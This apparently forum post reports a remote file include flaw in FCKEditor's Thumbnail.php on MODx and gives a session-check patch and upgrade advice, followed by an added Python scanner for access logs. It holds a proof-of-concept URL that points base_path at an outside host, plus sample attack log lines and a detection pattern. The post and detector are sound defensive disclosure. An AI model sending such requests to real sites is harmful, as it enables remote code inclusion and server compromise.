Security Flaw in FCKEDITOR (ModX)

Prakash

Perch
I found one security threat when using FCKEditor with MODx CMS: a Remote File Include vulnerability in Thumbnail.php.

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/

Solution: Please add the code given below in /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php:
Code:
// Refuse direct requests: $_SESSION['mgrValidated'] is only set once a user
// is logged in to the MODx manager, so it is absent for anonymous web clients.
if (!isset($_SESSION['mgrValidated'])) {
    die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx Content Manager instead of accessing this file directly.");
}

Please update your site to 0.9.2.2 for a proper fix to this issue.
http://modxcms.com/downloads.html
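For administrators who want to know whether the issue above was ever probed on their site, here is an added detection example (not code from the post or from MODx) that scans Apache combined-format access logs for requests to Thumbnail.php whose base_path carries a URL scheme instead of a local path. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2006:13:56:01 +0000] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/assets/images/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2006:13:57:12 +0000] "GET /index.php?id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:58:40 +0000] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=ftp://203.0.113.5/ HTTP/1.1" 500 0 "-" "curl/7.15"
"""

# Fields of a combined-format line that the scan needs: client IP, timestamp,
# request target and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate base_path is a local path; any value that starts with a
# "scheme://" prefix (http, https, ftp, or a PHP stream wrapper) is suspicious.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]+://', re.IGNORECASE)

VULNERABLE_PATH = "/connectors/php/commands/thumbnail.php"


def is_remote_include_attempt(target):
    """True if the request hits Thumbnail.php with a URL-scheme base_path."""
    parsed = urlparse(target)
    if not parsed.path.lower().endswith(VULNERABLE_PATH):
        return False
    # parse_qs percent-decodes values, so encoded "http%3A%2F%2F" is caught too.
    for value in parse_qs(parsed.query).get("base_path", []):
        if SCHEME_RE.match(value):
            return True
    return False


def scan_log(text):
    """Return (ip, timestamp, status) for every matching request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("status")))
    return hits


if __name__ == "__main__":
    for ip, ts, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} -> Thumbnail.php remote base_path (HTTP {status})")
```

A hit with a 200 status deserves a closer look at what the included URL served; a 500 usually means the include failed, but the source address is still worth watching.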